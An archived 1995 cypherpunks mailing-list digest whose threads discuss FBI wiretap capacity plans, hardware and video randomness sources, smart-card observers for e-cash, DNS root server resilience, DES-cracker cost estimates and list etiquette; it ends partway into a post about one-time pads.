> Dave Emery die at die.com From s1113645 at tesla.cc.uottawa.ca Fri Nov 3 23:58:51 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 4 Nov 1995 15:58:51 +0800 Subject: [political noise] Re: Crypto & Taxes In-Reply-To: <9511031621.AA11770@zorch.w3.org> Message-ID: On Fri, 3 Nov 1995 hallam at w3.org wrote: > Why unfortunately? I happen to consider that our modern social economy > is a high point of civilisation. It is certainly a tremendous achievement. > We can educate the entire population, provide them with health care, > prevent famine and provide protection against crime and aggression by > other states. All in all rather a good deal. That wonderful state of bliss seems rather limited in certain parts of the world. Not that I want to get into a big political discussion, but David Friedman has a nice, calm and rational book called The Machinery of Freedom, 2nd ed, which argues anarchism/libertarianism from an economist's point of view. The argument is not cased in terms of ethics and morals but rather economic efficiency and utility. Slim, easy to read and cheap. He also has a good sense of humor. Unfortunately the book is currently on back order. I'm holding on to my library copy until they ship one to me. You can butt heads with him and Tim on the cyberia list (I don't remember the address but they have it at news://nntp.hks.net ) I gather from the cyphernomicon that someone recently converted him to cryptoanarchy. From futplex at pseudonym.com Sat Nov 4 00:00:38 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 4 Nov 1995 16:00:38 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net> Message-ID: <199511030603.BAA24442@opine.cs.umass.edu> clarkm at cnct.com writes: > > Last year, federal and state courts authorized 1,154 wiretaps, [...]
> > "People are starting to say that seems awfully high," Dempsey said, noting > > that the overall level of such surveillance activity is now a total of > > 20,000 to 25,000 intercepts nationwide over an entire year. > > So what is it? 1,154 wiretaps? Or 20,000? For one thing, many conversations on a line may be intercepted over time after the initial wiretap order is given. Also wiretapping is not the only form of electronic surveillance that tends to get reported in these numbers. The official federal wiretap reports for the last several years place the number of wiretaps in the neighborhood of 1,000+ in each of those years. Actually the number 20,000 sounds strange -- it seems too high merely to be a total of surveillance orders/operations, yet far too low to count all interceptions. I recently heard the total number of conversations intercepted per year in the U.S. estimated on the order of 2,000,000. Some rather small percentage of those were categorized as "incriminating". I suppose it might have been 1%, which would work out to 20,000 incriminating intercepted calls per year nationwide. -Futplex From perry at piermont.com Sat Nov 4 00:02:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 4 Nov 1995 16:02:30 +0800 Subject: Many Topics are Appropriate for Discussion Here In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu> Message-ID: <199511040057.TAA00783@jekyll.piermont.com> Futplex writes: > Perry writes: > > I don't care about quantity. Steve Bellovin is worth 500 subscribers > > -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a > > lot of this stuff than most of what passes for careful thought from > > the average person here. > > I have some not-so-hypothetical questions: > > Suppose I have serious and plausibly realistic aspirations to become an > authority in some subtopic of cryptography, network security, etc. (sometime > well into the next millennium).
Am I more likely to learn and hone my skills > by actively participating (sticking my neck out) or merely lurking > indefinitely ? Regardless of the answer to the previous question, should > the list suffer me my missteps and naivete ? > > I do not consider these questions rhetorical, and the answers are very > important to me on a personal level. I don't see any problem with a naive person participating. I do see something wrong with people posting stuff that has nothing whatsoever to do with the topic of cryptography etc. A discussion of social security privatization might be interesting, but irrelevant, to name one example. Perry From JMKELSEY at delphi.com Sat Nov 4 00:08:00 1995 From: JMKELSEY at delphi.com (JMKELSEY at delphi.com) Date: Sat, 4 Nov 1995 16:08:00 +0800 Subject: wiretaping ability and future plans Message-ID: <01HX6STU0B649AO7EU@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Thu, 02 Nov 1995 01:55:06 -0800 >From: Jay Campbell >Subject: FBI seeks huge wiretapping system >FBI seeks huge wiretapping system >BY JOHN MARKOFF >New York Times >``These are staggering numbers,'' said Mark Rasch, director of >information security law and policy for Science Applications >International Corp. in McLean, Va. ``Either they do a lot more >wiretaps than they now admit, or they plan on doing a significant >larger number of wiretaps in the future because of the fear of >domestic terrorism.'' I can see at least two possible alternative explanations: 1. The FBI envisions a time when voice-recognition systems will be cheap enough to do "keyword searches" on digital voice in something close to real time, with high accuracy. This might be useful when fishing for crime, dissent, etc. It would certainly require some rather broader powers, but they may expect this, especially if they expect more acts of domestic and foreign terrorism. 2. 
After implementing some kind of widespread escrowed crypto, the FBI envisions recording lots of encrypted phone conversations, perhaps targeted on suspicious people, perhaps random. Since the whole conversation is encrypted, this might not violate any laws, since they still have to get the warrant to recover the conversation. This would get them past the obvious practical problem with most wiretap-based investigations--if you start your wiretap three days after the target becomes a suspect, you've probably missed all the juicy stuff. Only a bit of carelessness or stupidity on the part of your target will get the desired information. > Jay Campbell edge at got.net - Operations Manager > -=-=-=-=-=-=- Sense Networking, Santa Cruz Node > Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89 Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list. --John Kelsey, jmkelsey at delphi.com PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36 From JMKELSEY at delphi.com Sat Nov 4 00:09:30 1995 From: JMKELSEY at delphi.com (JMKELSEY at delphi.com) Date: Sat, 4 Nov 1995 16:09:30 +0800 Subject: video as a source of public randomness Message-ID: <01HX6SUGVCSI9AO7EU@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Thu, 02 Nov 1995 00:39:29 -0800 >From: tcmay at got.net (Timothy C. May) >Subject: Re: Video as a source of randomness >Digitized video input, especially from something like a noisy channel (t.v. >channel, for example), is quite likely to produce a lot more entropy bits >per second than nearly any of us ever need. (One's PGP key could be seeded >in a fraction of a millisecond, for example.)
This seems like a potential source of a stream of public random bits. If these can be authenticated and matched, this kind of thing can be useful in a lot of protocols. For example, if there is some packet structure in the digital video transmission which has at least 160 bits of entropy, then we can take the SHA1(packet[i]) to be public random bit block i. (If we're worried about entropy, we can collect arbitrarily large numbers of packets to hash per 160-bit public random block.) For large-scale, above ground protocols, these packets would need some kind of signature or other authentication. However, for protocols that could handle having the public random string checked offline later, this idea provides a reasonably good public random string that can be used without any knowledge or consent of the broadcaster/cable system/satellite system/whatever. If the transmission is sent under encryption, so much the better. This does still leave the possibility that an attacker could control the broadcaster's transmissions for a few seconds, but this seems unlikely in practice. An alternative might be the encrypted transmissions from any communications satellite. How many telephone calls are your opponents able to reroute? >--Tim May, who has both audio and video digitizers built into his Power >Macintosh 7100av, but notes that none of the crypto programs he uses has >any provision for using them, and so he doesn't use them for crypto >purposes. Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list. 
--John Kelsey, jmkelsey at delphi.com PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36 From pmonta at qualcomm.com Sat Nov 4 00:29:32 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Sat, 4 Nov 1995 16:29:32 +0800 Subject: Sources of randomness Message-ID: <199511040804.AAA03552@mage.qualcomm.com> Perry Metzger writes: > > [ radioactive vs. other ] > > I didn't contend that it's inferior. I contended that it's difficult to > distinguish from sources of electronic interference and is easy to get > wrong. Point taken; it sounds like I misread your post a bit. Certainly it's better to have a robust implementation than a delicate one, but let me argue how hard it might be to get electronic sources wrong. > ... > Someone can gimmick a zener diode or get it "wrong" a lot more easily > than they can get a radiation event wrong. But how wrong is wrong? Unless the design is catastrophically bad, a zener source is going to give you zener noise plus some slight admixture of interference. Say the designer is extremely careless and there's deterministic interference 20 dB down. I don't see how even that matters cryptographically---the resulting loss in entropy will be millibits per sample. Perhaps there ought to be a couple of standard random-bit-source implementations, say at the CMOS-standard-cell and board-subsystem levels, that are widely vetted and trusted (and used!). But it's mostly a solved problem, seems to me. A radioactive source might be okay at the board level (though probably costlier than its electronic counterpart), but it'd be a pain to integrate, and it might disturb the rest of the chip.
(I'd like to have a get_random_bit instruction as part of a microprocessor, for example.) Also if you want a high rate of random bits, you need many decay events, whereas for electronic sources the corresponding bandwidth is free---Johnson and shot noise are flat to 1 THz or so. Interestingly enough, zener diodes and particle detectors are a lot alike. Zeners, if they're avalanching, already have some internal gain; each electron crossing the junction gets so hot it knocks off other electrons, and there's a chain reaction. Particle detectors take the ion trail in a suitable environment and make a nice big pulse out of it with a similar chain-reaction effect (though the fancier kind will give you the actual amount of charge). Cheers, Peter Monta pmonta at qualcomm.com Qualcomm, Inc./Globalstar From perry at piermont.com Sat Nov 4 01:40:02 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 4 Nov 1995 17:40:02 +0800 Subject: Many Topics are Appropriate for Discussion Here In-Reply-To: <9511032235.AA13095@zorch.w3.org> Message-ID: <199511032304.SAA00611@jekyll.piermont.com> hallam at w3.org writes: > There is a bug in mh mail that causes all mails to be rejected after > there are more than 9999 in the same mailbox. I received 100 in two hours > today so I suspect the subject line may well be related to my earlier post. There isn't such a bug in MH, but mhe, if you are using it, won't show more than that number. Simply split your mailbox and all is well again. > Just a calibration point. The libertarians on the list do not seem > to shrink from expressing their political views. I don't express my general political opinions very much at all. As it turns out, I'm a very radical libertarian, and anyone reading my stuff elsewhere would know that, but I don't discuss this stuff in public. > Indeed the entire discussion > on the NSA is a political thread pure and simple.
This list *is* political in the sense that it is for people who have chosen the view that the spread of cryptography is good. It is not, however, a list for just *any* political discussion. The topic is purely cryptography, and we operate largely from the viewpoint that if you think crypto is very evil you probably should discuss that elsewhere. > Government regulation often provides social benefits > it is not by definition an evil to be avoided. I would disagree, but that is a discussion for elsewhere. > If someone comes up with a crypto proposal to avoid paying taxes I > know it will never get anywhere. A lot of what Tim May has been talking about here for many years is the inevitability that cryptography will weaken current financial controls -- sooner or later, whether the central governments want it to happen or not. > PS I'm also none too impressed by people who make comments like "you are wrong > about XXX but I won't explain why". I sent you a detailed explanation, in PRIVATE mail, of why you were wrong about governments being the only way to provide roads, including lots of counterexamples to your claim. However, this is not libernet, this is cypherpunks, and this isn't a place for that discussion. That's why I sent you PRIVATE mail. Perry From weidai at eskimo.com Sat Nov 4 03:10:26 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 4 Nov 1995 19:10:26 +0800 Subject: Crypto++ 1.1 Message-ID: I am still talking to RSADSI's lawyers, but it's taking a lot longer than I expected. So in the meantime I've decided to rerelease the Crypto++ library with RC4, RC5, RSA removed, and some calls to RSAREF disabled. RSADSI said it will not object to this rerelease. Version 1.1 also has some minor bug fixes. You can find it at ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip where ????? is in ftp://ftp.csn.net/mpj/README For the next version I hope to work out a deal with RSADSI to put some of those files back in.
I'm also planning to add SAFER and perhaps some elliptic curve stuff. Other suggestions are welcome. I encourage people to use this library in commercial as well as shareware/freeware products. You don't have to pay me a cent, but don't forget about the patents. Wei Dai P.S. Does anyone know if elliptic curve key agreement protocols are patented? From robl at on-ramp.ior.com Sat Nov 4 03:29:05 1995 From: robl at on-ramp.ior.com (Rob L) Date: Sat, 4 Nov 1995 19:29:05 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net> Message-ID: > FBI Director Louis Freeh testified under oath to 1,157. The FBI was asked > for the data to support those numbers. The FBI refused to release them > until the year 2002. > > What's so special about the year 2002? Maybe he plans to retire and leave the country by then.. to find a more secure, less invasive Gov't to live under.. ;) RobL Rockford, Wa From tcmay at got.net Sat Nov 4 03:30:50 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 4 Nov 1995 19:30:50 +0800 Subject: Sources of randomness Message-ID: At 9:43 PM 11/2/95, Carl Ellison wrote: >>Date: Thu, 2 Nov 1995 00:39:29 -0800 >>From: tcmay at got.net (Timothy C. May) > >>Digitized video input, especially from something like a noisy channel (t.v. >>channel, for example), is quite likely to produce a lot more entropy bits >>per second than nearly any of us ever need. (One's PGP key could be seeded >>in a fraction of a millisecond, for example.) > >My cable feed into my Mac, for example, has surprisingly little noise -- >and it's only local noise (stuff only at my house, not available to the >eavesdropper) which counts as entropy. I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with rabbit ears, or nothing (since the idea is to get noise, from the ether, or from the tuner itself). 
A snow-filled picture has pixels which are unlikely in the extreme to be predicted/deduced by outside attackers, who cannot know the details of antenna orientation, microscopic variations in geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not guessable. (I'm not convinced that _cable_ signals are not random enough: my cable picture is far from perfect, and my specific cable configuration and tuner variations are certainly contributing to variability of the image pixels. Granted, regularities in the image that are known to attackers--this is all in theory, of course--will serve to reduce the entropy. But there's so much bandwidth to burn that I suspect that even cable signals are OK to use. Of course, removing the cable input is trivial and produces a spectacularly snowy set of images....) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From stewarts at ix.netcom.com Sat Nov 4 03:30:56 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 4 Nov 1995 19:30:56 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas Message-ID: <199511030709.XAA23931@ix8.ix.netcom.com> At 12:03 AM 11/3/95, clark.matthews at paranet.org wrote: >Thanks for this item! Two little excerpts jump out at me. They follow: >> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 >> percent .... 
>> "People are starting to say that seems awfully high," Dempsey said, noting that >> the overall level of such surveillance activity is now a total of 20,000 >> to 25,000 intercepts nationwide over an entire year. >So what is it? 1,154 wiretaps? Or 20,000? Perhaps that's 1154 wiretap victims, with an average of 20 intercepts each? In a separate article, Clark posted estimates that ranged from 500K - 1.5M people could be wiretapped, depending on how many people are in the 1%/.5%/.25% zones. It's worse than that - if they're tapping the average victim for (say) 3 months, that's 4 times as many victims.... And just how many cops do they plan to hire to watch all these phones? Computers can help some, especially for data, but who's going to read it all, even after the fancy pattern recognition systems pick out the possible good stuff. >FBI Director Louis Freeh testified under oath to 1,157. The FBI was asked >for the data to support those numbers. The FBI refused to release them >until the year 2002. [....] >One last thing. >What's so special about the year 2002? Statute of limitations? :-) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From tcmay at got.net Sat Nov 4 03:31:13 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 4 Nov 1995 19:31:13 +0800 Subject: video as a source of public randomness Message-ID: At 6:23 AM 11/3/95, JMKELSEY at delphi.com wrote: >>From: tcmay at got.net (Timothy C. May) >>Subject: Re: Video as a source of randomness > >>Digitized video input, especially from something like a noisy channel (t.v. >>channel, for example), is quite likely to produce a lot more entropy bits >>per second than nearly any of us ever need. (One's PGP key could be seeded >>in a fraction of a millisecond, for example.) > >This seems like a potential source of a stream of public random >bits. 
If these can be authenticated and matched, this kind of thing >can be useful in a lot of protocols. For example, if there is some I'm not sure what you mean by "public random bits"...I don't plan to share my random bits with anyone, nor do I see any need for "public" random bits (except for some well-known situations involving statistical testing, for which certain PRNGs are actually preferable to "real" random numbers). And so there's no confusion, when I said "like a noisy channel (t.v. channel, for example)" I meant a snowy, noisy picture such as one gets with rabbit ears on top of the set, especially when the channel is an unused one. It is unlikely in the extreme that any attacker could deduce the snowy pixel values used in the distillation of entropy. (I'm not claiming this is the most practical source of randomness; I was just responding to an earlier post about this.) But back to the subject of "public random bits." Could you elaborate on what you mean by this? (I assume you don't mean a one time pad that Alice and Bob share, since that is really a separable issue from video as a source of randomness. Only one of them will generate the pad, and will then securely communicate it to the other.) What am I missing? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
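Added example, not part of either message above: a sketch of the "public random bits" construction from the quoted Kelsey post, where block i is SHA-1 over one or more broadcast packets and anyone who recorded the same transmission can check the blocks offline later. The packet bytes are constructed stand-ins, and the function names, the 188-byte packet size and the length-prefix framing are assumptions of this example.

```python
import hashlib
import struct

DIGEST_LEN = 20  # SHA-1 output: the 160-bit block size named in the post


def _group_digest(group):
    """SHA-1 over a group of packets, each length-prefixed so that
    packet boundaries inside the group are unambiguous (framing is an
    assumption of this example, not something the post specifies)."""
    h = hashlib.sha1()
    for pkt in group:
        h.update(struct.pack(">I", len(pkt)))
        h.update(pkt)
    return h.digest()


def public_random_blocks(packets, packets_per_block=1):
    """Return the list of 160-bit public random blocks for a packet stream.

    Block i covers packets [i*k, (i+1)*k). Raising k is the post's answer
    to low per-packet entropy. A trailing partial group is dropped because
    it has not yet collected its full share of packets.
    """
    if packets_per_block < 1:
        raise ValueError("packets_per_block must be >= 1")
    k = packets_per_block
    full = len(packets) - len(packets) % k
    return [_group_digest(packets[i:i + k]) for i in range(0, full, k)]


def check_offline(recorded_packets, claimed_blocks, packets_per_block=1):
    """Recompute blocks from a recording and return the indices that disagree.

    This is the 'checked offline later' case: a verifier who recorded the
    same broadcast audits the blocks a protocol run claims to have used.
    Claimed blocks past the end of the recording count as mismatches.
    """
    expected = public_random_blocks(recorded_packets, packets_per_block)
    bad = []
    for i, claimed in enumerate(claimed_blocks):
        if i >= len(expected) or claimed != expected[i]:
            bad.append(i)
    return bad


def constructed_broadcast(n_packets, size=188):
    """Constructed stand-in for captured broadcast packets (not real video)."""
    out = []
    for i in range(n_packets):
        seed = hashlib.sha256(b"constructed-packet-%d" % i).digest()
        out.append((seed * (size // len(seed) + 1))[:size])
    return out


def demo():
    packets = constructed_broadcast(10)
    # Alice derives blocks from groups of 4 packets: 2 full blocks, 2 packets left over.
    alice = public_random_blocks(packets, packets_per_block=4)
    # Bob recorded the same broadcast independently and finds no mismatch.
    same = check_offline(packets, alice, packets_per_block=4)
    # A recording that differs in one bit of packet 5 disagrees only in block 1.
    altered = list(packets)
    altered[5] = altered[5][:-1] + bytes([altered[5][-1] ^ 1])
    differs = check_offline(altered, alice, packets_per_block=4)
    return alice, same, differs


if __name__ == "__main__":
    blocks, same, differs = demo()
    for i, block in enumerate(blocks):
        print(i, block.hex())
    print("mismatches, identical recording:", same)
    print("mismatches, one packet altered:", differs)
```

The check only shows that two recordings agree; it says nothing about how much entropy the packets actually carry, which is the separate question raised in the thread.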
From sjb at universe.digex.net Sat Nov 4 05:16:47 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 4 Nov 1995 21:16:47 +0800 Subject: Info needed on observers In-Reply-To: Message-ID: <199511032049.PAA13455@universe.digex.net> Leo Van Hove writes: >I am currently preparing a paper on payment systems for the Internet >and related issues. I recently found out that so-called observers could >be placed on smart cards (in order to prevent double spending, or even to >prevent people from cheating on taxes...). > >To be honest that's about all I know about observers and I am very eager >to find out more. I am, however, having a hard time finding interesting >references on this subject. > >Hence, all suggestions to get me started would be extremely welcome. >Questions of particular interest are: possible functions (and limits), >how 'real' are they already?, what about privacy?, ... With ecash it's possible to duplicate a coin and spend it twice --- it's not really any different than copying a file and printing each copy, after all. In most ecash schemes, the double-spender can be detected and identified when the coins are deposited, but this could be long enough for him to disappear, leaving the bank or the payee holding the bag. An "observer" is designed to create a prior restraint to double-spending. The observer is a tamper-resistant smart card that must be involved in all coin transfers. When the coin is withdrawn from the bank, the observer's signature is needed to validate it. When the coin is spent, the *same* observer's signature is again needed to validate it. The observer won't sign the same coin twice during the spend protocol. To double-spend with an observer present, you'd need to bypass the tamper resistance. From sjb at universe.digex.net Sat Nov 4 05:17:46 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 4 Nov 1995 21:17:46 +0800 Subject: censored? 
corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.> Message-ID: <199511032037.PAA13172@universe.digex.net> Sten Drescher writes: >sameer said: >> The US govt. doesn't run the root nameservers, nor are all the >> root nameservers within US jurisdiction. > > Granted, the US Govt doesn't run the US-based root servers. >But, if an Internet 'Decency' law was passed, they certainly could try >to threaten the US-based root server maintainers to make the cascading >threats. And, as I understand the way DNS resolution works, address >requests go down to your root domain then up from the other root domain, >i.e., for me to find out what c2.org's address is, my system requests >from: >NS mpd.tandem.com >NS tandem.com >NS com >NS org > >If this is correct, if the com NS has the entry for the org NS, I won't >be able to resolve those names. Of course, explicit IP addresses and >/etc/hosts entries would still work. It isn't correct. First, your host is immediately looking for a nameserver for c2.org, by querying its configured default server (say, piaget.mpd.tandem.com) for it. If the server already has the answer cached, it's returned immediately. If not, a bit in the query tells it whether the client wants it to find the answer or return an "I don't know" answer -- most want it to find an answer. Piaget.mpd.tandem.com probably already knows enough to bypass queries to the tandem.com and com domains, since it's probably already resolved at least one org query. It can then go directly to a server for org to get the c2.org information the client requested. The other confused point you have is that there isn't just *one* server for org. There are at least a dozen interchangeable root nameservers which handle all of com, org, edu, net, mil, gov, and the country domains (us, uk, de, etc).
It's been a matter of policy for quite some time now that to register a sub-domain under one of the top level domains (i.e., to register c2.org under org) you must demonstrate two accessible nameservers for the new domain. I note, for example, that mpd.tandem.com has *four* nameservers. To eliminate "tandem.com" from the DNS, all of the dozen or more root nameservers, which are in different jurisdictions, must be compromised. Even then, sub-domains of the top level generally offer very long expiration periods for cached data. It could be years before the data left the cache from some of the second level servers, assuming they stayed up that long. It would almost certainly be long enough to get a judge to slap an injunction against the action. Once again, the net interprets censorship as damage and routes around it. From stewarts at ix.netcom.com Sat Nov 4 05:18:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 4 Nov 1995 21:18:59 +0800 Subject: FBI seeks huge wiretapping system Message-ID: <199511030140.RAA05160@ix11.ix.netcom.com> At 12:09 PM 11/2/95 -0500, Phill Hallam wrote: >On telephone tapping the statement was made that they do not allow >unauthorized taps and that technology was making wildcat taps by >local officials harder. Which makes sense. At least for the moment, wildcat taps have become much easier, since radio-tapping cellular phones is straightforward. >It is a fair point that just because technology has changed the >nature of the game it should not mean that wiretaps cease to be >possible. Back before telephones, you could steam open someone's mail if they sent it by the government post, but it was a lot harder if they sent it by private messengers, and they could always send it in some pre-arranged code. And you could always hang out under the eaves of their houses listening for conversations, but they could always check for themselves or talk while walking down the street. 
It's a fair point that just because technology has made it easier for eavesdroppers and mail-snoops today doesn't mean that private conversations should cease to be possible, or that we shouldn't be able to use technology to preserve the security of our papers and effects. >What is very odd however is the FBI request for $500 million. This is >a somewhat large quantity of money to say the least. The telephone >switches are programmable these days, it should be possible to >provide tapping at substantially less cost. $500 million is a drop in the bucket; they're talking about wedging themselves into multiple places in the telephone system, taking up to 1 percent of the capacity (without compensation as near as I can tell), and they want the ability to do all this without the inconvenience of going out to telephone wire offices where somebody might ask to see a warrant. >Mind you the Federal government is not known for tight cost control. Indeed :-) >The NSA reckoned that a DES cracker would cost substantially more than >$1 million because the system costs would be much higher than the component costs. .... > Anyway the NSA price estimate was "two or more orders of magnitude more in cost" Wiener's design was about two orders of magnitude cheaper than Wayner's and the DEC guy's designs, which were in turn far cheaper than any previous. But it's a believable design, and could probably be done within a factor of two-three of his cost predictions; "system costs" need to include things like wiretapping equipment to steal and record the data to be cracked, and government employees to operate it, and bureaucrats and politicians to tell them what to do and who to target, and lots of real estate for them all. But to reach two or more orders of magnitude cost increase, I'd think you'd need a far bigger collection of cracking machines than Wiener's - perhaps to crack a few hundred keys per day. Interesting comments on banks' use of DES for authentication rather than privacy....
of course, if the government wants to tap banks' conversations, it can generally just demand that the banks tell them the information, at least for US-based and other cooperative banks. >If the NSA want a cheap DES cracker they have my number. I'll take 5% >of the difference between the actual cost and $100 million (their >estimate of cost) as my fee. As Rodney Dangerfield said "Well to start with, you gotta throw in 10% for graft and corruption." #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From gate at id.wing.net Sat Nov 4 05:20:47 1995 From: gate at id.wing.net (Lee) Date: Sat, 4 Nov 1995 21:20:47 +0800 Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas Message-ID: <199511030241.VAA26248@minerva.cis.yale.edu> FBI Wants to Wiretap One of Every 100 Phones in Urban Areas By MATT YANCEY Associated Press Writer WASHINGTON (AP) - The FBI wants the capability to simultaneously tap one of every 100 phone and data transmission lines in major urban centers, but a top Justice Department official said there are no plans to expand the existing number of wiretaps. As part of its effort to deal with a new breed of computer-savvy criminals adept at using new telecommunications technologies, the FBI said it wants phone companies to initially set aside 0.5 percent, or one of every 200 lines, for law enforcement use in high-crime urban areas. But it added it also wants the ability to rapidly expand that capability to one of every 100 lines if the need arises. The disclosure was made in a little-noticed announcement in the Federal Register. Despite the notice, Deputy Attorney General Jamie Gorelick said today, "There is no intention to expand the number of wiretaps or the extent of wiretapping ... I don't think the American people should be worried about that."
Last year, federal and state courts authorized 1,154 wiretaps, of which 48 percent were sought by federal agents. Increases in recent years have mostly come in drug trafficking cases. Gorelick acknowledged: "As we've gotten more aggressive in the drug war, as organized gang activity has been an increased focus for us, we've seen a slight increase." The FBI proposal, unveiled on three pages of the thick daily compendium of federal regulations and other government activities for Oct. 16, had been long anticipated since the passage last year of the Communications Assistance for Law Enforcement Act. "The entire purpose of the digital telephony legislation was to leave law enforcement in the same position it is now with respect to wiretaps: That is, to ensure that emerging digital technology would not defeat current lawful wiretaps," Gorelick said, noting that court approval would still be required for any wiretap. "There appears to be some misunderstanding or miscommunication as to the implications of what is contained in that notice." But experts familiar with the law did not expect the FBI's reach into the world of new fiber optic cables, digital switches and high-speed modems for transmitting business transactions as well as voices to be so sweeping. "The level of capacity that the FBI is proposing here would come as a surprise to many who supported the legislation," said James X. Dempsey, deputy director of the Center for National Security Studies, a group that monitors government surveillance activities. While the federal notice does not specify which cities would be targeted, Dempsey said New York is likely to be one of them. Assuming there are 2 million separate phone and data transmission lines there, that means the FBI wants the ability to tap 20,000 of them simultaneously, he said.
"People are starting to say that seems awfully high," Dempsey said, noting that the overall level of such surveillance activity is now a total of 20,000 to 25,000 intercepts nationwide over an entire year. The FBI said in its official notice that its capability needs were based on "an historical baseline of electronic surveillance activity" after surveying federal, state and local courts, prosecutors and police agencies. It did not offer a further explanation, but during hearings over the past four years leading to passage of the 1994 law, FBI and other officials cited the growing incidence of computer-based crimes. The law was intended to remove what law enforcement officials have considered a major impediment - the growing obsolescence of the copper phone wire - in probing drug trafficking, organized crime, terrorism, kidnaping and sophisticated new types of white-collar crime. "Without this bill ... we would have been completely prevented in a very short time from carrying out any court-approved wiretapping," FBI Director Louis Freeh said at the time. While law enforcement officers will still have to get court approval for any wiretaps they install, the technological measures authorized by the law would remove the objections of some judges. Copper telephone lines were relatively easy to tap because they carried only one conversation. But digital switches and fiber optics now in growing use often carry hundreds of conversations or data transmissions at the same time, making it difficult to isolate a single phone line. The law authorized $500 million for the government to pay the phone companies their cost in installing the necessary technology, but none of the money has been appropriated. And with increased criticism focused on the FBI for its role in the 1993 Branch Davidian siege in Waco, Texas, and the 1992 deadly standoff against white separatist Randy Weaver in Ruby Ridge, Idaho, there is no assurance Congress will be forthcoming with the money. 
Legislation sent by President Clinton to Congress seeking greater wiretap authority in the wake of the April bombing of the federal building in Oklahoma City is languishing in congressional committees and is given little prospect of being passed this year. http://www.trib.com/NEWS/HEAD/FBI.html From jya at pipeline.com Sat Nov 4 05:37:51 1995 From: jya at pipeline.com (John Young) Date: Sat, 4 Nov 1995 21:37:51 +0800 Subject: 800_ape Message-ID: <199511041323.IAA16916@pipe1.nyc.pipeline.com> 11-5-95. NYPaper Sunday Magazine: "Making Microsoft Safe For Capitalism. How do you restrain an 800-pound gorilla?" Cover story. By James Gleick. If the software giant has its way, it will soon be in a position to collect a charge for every airline ticket you buy, every credit card purchase you make, every fax you send, every picture you download, every Web site you visit. It's time to draw the line. But where? 'Anything not a direct lie or clearly illegal is O.K. to do if it advances Microsoft's tribal cause,' Mitchell Kapor says. 'This licenses the worst sort of manipulations, lies, tortured self-justification and so on.' 800_ape (Long) From cmckie at ccs.carleton.ca Sat Nov 4 06:25:35 1995 From: cmckie at ccs.carleton.ca (Craig McKie) Date: Sat, 4 Nov 1995 22:25:35 +0800 Subject: ICE Summary Message-ID: <9511041401.AA04992@superior> Summary of the 2nd International Cryptography Experiment (ICE) Workshop, Shape Technical Centre, The Hague, Sept.18-19, 1995 http://www.tis.com/crypto/ice/summary.html From Alan.Pugh at internetMCI.COM Sat Nov 4 07:06:29 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Sat, 4 Nov 1995 23:06:29 +0800 Subject: using pgp to make an otp Message-ID: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- greetings c-punks, i may have posted this at some time in the past, as i have asked it elsewhere and gotten different responses.
